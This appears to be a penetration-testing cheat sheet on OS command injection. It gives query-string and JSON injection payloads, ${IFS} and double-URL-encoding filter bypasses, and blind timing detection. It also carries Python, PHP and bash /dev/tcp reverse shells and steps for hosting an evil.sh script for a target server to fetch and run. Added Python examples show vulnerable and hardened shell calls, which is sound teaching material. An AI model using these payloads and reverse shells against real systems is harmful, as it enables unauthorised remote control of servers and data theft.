OS Command Injection

Last modified: 2023-11-11


Basic Payloads

If a payload contains whitespace, encode each space as '+' or '%20' when sending it in a URL query string.



/?cmd=ls ..
/?cmd=ls ../
/?cmd=ls /home

/?cmd=`ping -c 1`

/?file=example.txt; echo $(ls -al /)
/?file=example.txt; echo $(ls -al /) |

<!-- PHP query string -->


<!-- Windows -->
/?file=example.txt | systeminfo #
/?file=example.txt ; systeminfo #
/?file=example.txt') ; systeminfo #
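The payloads above work because the application pastes the `file` parameter into a shell command line. The following is an added example (not code from the original page) showing that sink in Python beside two fixes: shell-quoting the value, and the preferred form that never starts a shell at all and allowlists the filename. The temporary file and the `INJECTED` marker are constructed test data.

```python
"""Vulnerable vs. hardened handling of a user-supplied filename.

Added example (not from the original page). The `file` value mirrors
the /?file=example.txt; ... payloads; `wc -c` stands in for whatever the
application does with the file. INJECTED is a constructed marker that
only appears in the output if the shell ran a second command.
"""
import os
import re
import shlex
import subprocess
import tempfile

# Allowlist: letters, digits, underscore, dot, dash; no leading dot (blocks ".."),
# no slash, no shell metacharacters.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]*")


def vulnerable_wc(path: str) -> str:
    """The classic bug: user input interpolated into a shell=True string.

    `wc -c example.txt; echo INJECTED` is parsed by /bin/sh as two commands.
    """
    cmd = f"wc -c {path}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def quoted_wc(path: str) -> str:
    """Mitigation 1: shell-quote the value. A shell still runs, but the whole
    value becomes one word, so `;` is data rather than a command separator."""
    cmd = f"wc -c {shlex.quote(path)}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def hardened_wc(base_dir: str, name: str) -> str:
    """Mitigation 2 (preferred): argv list, no shell, allowlisted name joined
    to a fixed directory, and `--` so the name can never be parsed as an option."""
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected filename: {name!r}")
    path = os.path.join(base_dir, name)
    return subprocess.run(["wc", "-c", "--", path], capture_output=True, text=True).stdout


def demo() -> dict:
    """Run all three variants against a constructed file and an injection payload."""
    with tempfile.TemporaryDirectory() as d:
        target = os.path.join(d, "example.txt")
        with open(target, "w") as f:
            f.write("hello\n")                      # 6 bytes, so wc -c reports 6
        payload = f"{target}; echo INJECTED"       # same shape as example.txt; echo $(...)
        out = {
            "vulnerable": vulnerable_wc(payload),   # contains INJECTED
            "quoted": quoted_wc(payload),           # wc errors on the odd name; no INJECTED
            "hardened_clean": hardened_wc(d, "example.txt"),
        }
        try:
            hardened_wc(d, "example.txt; echo INJECTED")
            out["hardened_payload"] = "accepted"
        except ValueError:
            out["hardened_payload"] = "rejected"
        return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

Quoting alone (`quoted_wc`) is the weaker fix: it still depends on every call site remembering to quote, and on the shell's quoting rules matching what `shlex.quote` produces. Removing the shell and allowlisting (`hardened_wc`) removes the parser the payload relies on.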

URL Encoding

We may be able to bypass a filter on specific characters by URL-encoding them. Double encoding ('%25' for the '%' itself) only helps when the value is decoded twice, e.g. once by the web server or WAF that applies the filter and again by the application code that builds the command.

# %0A: newline
# %250A: newline (double encoding)

# %26: &
# %2526: & (double encoding)
# &&

# %3B: ;
# %253B: ; (double encoding)
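To see why double encoding gets past a filter that single encoding does not, here is an added example (not from the original page) that models the decoding chain: a front-end filter that decodes the parameter once and rejects command separators, and a back-end that decodes again before use. The filter, the blocked set and the decode counts are constructed assumptions about a typical deployment.

```python
"""Single vs. double URL-encoding against a separator filter.

Added example, not from the original page. `naive_filter` and
`backend_value` are a constructed model: the front-end decodes once and
blocks separators; double encoding only pays off if the back-end
decodes a second time before building the command.
"""
from urllib.parse import quote, unquote

# Characters a simple command-injection filter typically rejects.
BLOCKED = {";", "&", "|", "\n", "`", "$"}


def encode(payload: str, rounds: int = 1) -> str:
    """URL-encode the payload `rounds` times (safe='' so ';' '&' '/' are encoded too)."""
    out = payload
    for _ in range(rounds):
        out = quote(out, safe="")
    return out


def naive_filter(raw_param: str) -> bool:
    """Model of a filter that decodes once and rejects blocked characters.
    Returns True when the request is allowed through."""
    decoded = unquote(raw_param)
    return not any(c in decoded for c in BLOCKED)


def backend_value(raw_param: str, decode_rounds: int) -> str:
    """Model of a back-end that decodes the value `decode_rounds` times."""
    v = raw_param
    for _ in range(decode_rounds):
        v = unquote(v)
    return v


def probe(payload: str) -> dict:
    """For single and double encoding, show what the filter sees and what
    reaches the command line for a single- and a double-decoding back-end."""
    results = {}
    for rounds in (1, 2):
        enc = encode(payload, rounds)
        results[rounds] = {
            "sent": enc,
            "passes_filter": naive_filter(enc),
            "backend_single_decode": backend_value(enc, 1),
            "backend_double_decode": backend_value(enc, 2),
        }
    return results


if __name__ == "__main__":
    for rounds, r in probe("; id").items():
        print(rounds, r)
```

With `; id` the single-encoded form `%3B%20id` decodes to a literal `;` at the filter and is dropped, while `%253B%2520id` decodes only to `%3B%20id` there and passes; it becomes `; id` only if the back-end decodes again. If the back-end decodes once, the shell receives the harmless string `%3B%20id`, which is why double encoding needs to be confirmed rather than assumed.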

Bypass Whitespace Filter

Reference: https://www.ctfnote.com/web/os-command-injection/whitespace-bypass

If the website filters whitespace so that we cannot inject a command containing spaces (e.g. 'sleep 5'), use the shell's Internal Field Separator variable, ${IFS}, in place of each space; the filter sees no whitespace, and the shell expands ${IFS} to whitespace when the command runs.
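An added example (not from the original page) that rewrites a command with `${IFS}` and confirms against a real `/bin/sh` that the result still executes as separate words. It goes slightly beyond the page by also showing bash brace expansion (`{echo,hello}`), which is bash-only and does not work in POSIX `sh`. The whitespace filter and the `printf` sink are constructed stand-ins for the target application; `echo` is used instead of `ping` so it runs offline.

```python
"""Whitespace-filter bypass with ${IFS}, verified against a real shell.

Added example, not from the original page. `rejects_whitespace` models
the filter; `run_injected` models a sink that runs `printf '%s' <param>`
through `sh -c`. ${IFS} is the shell's Internal Field Separator (by
default space, tab, newline), so `echo${IFS}hello` becomes `echo hello`.
"""
import shutil
import subprocess


def rejects_whitespace(param: str) -> bool:
    """Constructed filter: block any parameter containing ASCII whitespace."""
    return any(c.isspace() for c in param)


def ifs_encode(command: str) -> str:
    """Replace each space with ${IFS}; works in sh, dash, bash, zsh."""
    return command.replace(" ", "${IFS}")


def brace_encode(command: str) -> str:
    """bash-only alternative: {echo,hello,x} brace-expands to `echo hello x`."""
    return "{" + ",".join(command.split(" ")) + "}"


def run_injected(param: str, shell: str = "sh") -> str:
    """Constructed vulnerable sink: the parameter lands unquoted in a shell string."""
    proc = subprocess.run([shell, "-c", f"printf '%s' {param}"],
                          capture_output=True, text=True)
    return proc.stdout.strip()


def demo() -> dict:
    cmd = "echo hello injected"
    plain = "x;" + cmd                 # blocked: contains spaces
    ifs = "x;" + ifs_encode(cmd)       # x;echo${IFS}hello${IFS}injected
    brace = "x;" + brace_encode(cmd)   # x;{echo,hello,injected}
    return {
        "plain_blocked": rejects_whitespace(plain),
        "ifs_blocked": rejects_whitespace(ifs),
        "ifs_sh": run_injected(ifs, "sh"),                       # ends with "hello injected"
        "brace_bash": run_injected(brace, "bash") if shutil.which("bash") else None,
    }


if __name__ == "__main__":
    print(demo())
```

The output of the `${IFS}` variant starts with the `x` that `printf` wrote, followed by `hello injected` from the injected command, which is the proof that the shell split the words after the filter had already passed the parameter.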


Payload Examples:

<!-- ping -c 5 -->


Try pinging our local machine to check whether the command injection works.
To see the result, start tcpdump on our local machine.

# -i: Interface e.g. eth0, tun0
sudo tcpdump -i eth0 icmp

Then execute the ping command in a POST request.

Below are examples of POST data.


Reverse Shell

file=example.jpg&filetype=png;export RHOST="";export RPORT=4444;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'

PHP Reverse Shell

Reference: https://book.hacktricks.xyz/pentesting-web/command-injection#examples

# 1. Download PHP payload
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
# (use the raw file URL; the GitHub "blob" page returns HTML, not the script)

# 2. Edit the `$ip` and `$port` values to point at our listener.
vim shell.php

# 3. Send payload & get shell (run `nc -lvnp <port>` in another terminal before doing this)

Blind Command Injection (Time Delay)

Inject a command with a known duration, such as "sleep 10" or "ping -c 10 127.0.0.1" (about 9 seconds), and check whether the page takes that much longer to load.


If the response is delayed, the injected command is being executed, and we can execute other commands as below.
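An added example (not from the original page) of the timing check in code: it measures a baseline request, then injects `sleep` behind each common separator and reports the first one that produces the expected delay. `vulnerable_target` and `safe_target` are constructed stand-ins for the web application so the example runs offline; against a real target the same function would wrap an HTTP request.

```python
"""Blind command injection detection by response-time difference.

Added example, not from the original page. Both targets are constructed
models of an application that passes a host parameter to a command
(`printf` stands in for `ping`); only the vulnerable one builds a shell
string. `sleep` is used so the example runs offline; `ping -c 10
127.0.0.1` gives a comparable delay where sleep is filtered.
"""
import subprocess
import time
from typing import Callable, Optional

# Separators to try, in the order a real probe usually tries them.
SEPARATORS = (";", "|", "&&", "\n")


def vulnerable_target(host: str) -> None:
    """Constructed vulnerable app: host interpolated into shell=True."""
    subprocess.run(f"printf '%s' {host}", shell=True, capture_output=True)


def safe_target(host: str) -> None:
    """Constructed safe app: argv list, no shell, so separators are just text."""
    subprocess.run(["printf", "%s", host], capture_output=True)


def timed(target: Callable[[str], None], value: str) -> float:
    start = time.monotonic()
    target(value)
    return time.monotonic() - start


def find_separator(target: Callable[[str], None], delay: int = 1,
                   baseline_host: str = "127.0.0.1") -> Optional[str]:
    """Return the first separator whose injected `sleep` delays the response
    by roughly `delay` seconds more than the baseline request, else None."""
    baseline = timed(target, baseline_host)
    for sep in SEPARATORS:
        injected = timed(target, f"{baseline_host}{sep}sleep {delay}")
        if injected - baseline >= delay * 0.8:
            return sep
    return None


def is_time_injectable(target: Callable[[str], None], delay: int = 1) -> bool:
    return find_separator(target, delay) is not None


if __name__ == "__main__":
    print("vulnerable:", find_separator(vulnerable_target))
    print("safe:", find_separator(safe_target))
```

Comparing against a baseline rather than an absolute threshold matters on slow or loaded targets; repeating the probe with a different delay (say 5 s, then 10 s) and checking that the response time tracks it rules out a coincidental slow request.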


JSON Injection

{ "username": "\"; pwd \"" }
{"email": "\";ping -c 1\""}

{"name":"<script>alert(1)</script>", "email":"victim@vulnerable.com"}

{"name": "admin", "content": "{{template: ./admin.php}}"}

PHP Injection

id=$(php -r '$sock=fsockopen("",4444);exec("/bin/sh -i <&3 >&3 2>&3");')

# URL-encode the payload before sending it in the query string

Indirect Payloads with Shell Script

If we cannot inject a command directly as above, try delivering it via a file.

Create a shell script. The filename here is `evil.sh`.

bash -c 'bash -i >& /dev/tcp/ 0>&1'

Host this file by starting a web server in the directory containing evil.sh.

sudo python3 -m http.server 80

On the target website, inject a command that makes the target server download the shell script and execute it. Before that, start a listener with `nc -lvnp 4444` in another terminal on the local machine. Here is an example.


We might get a shell.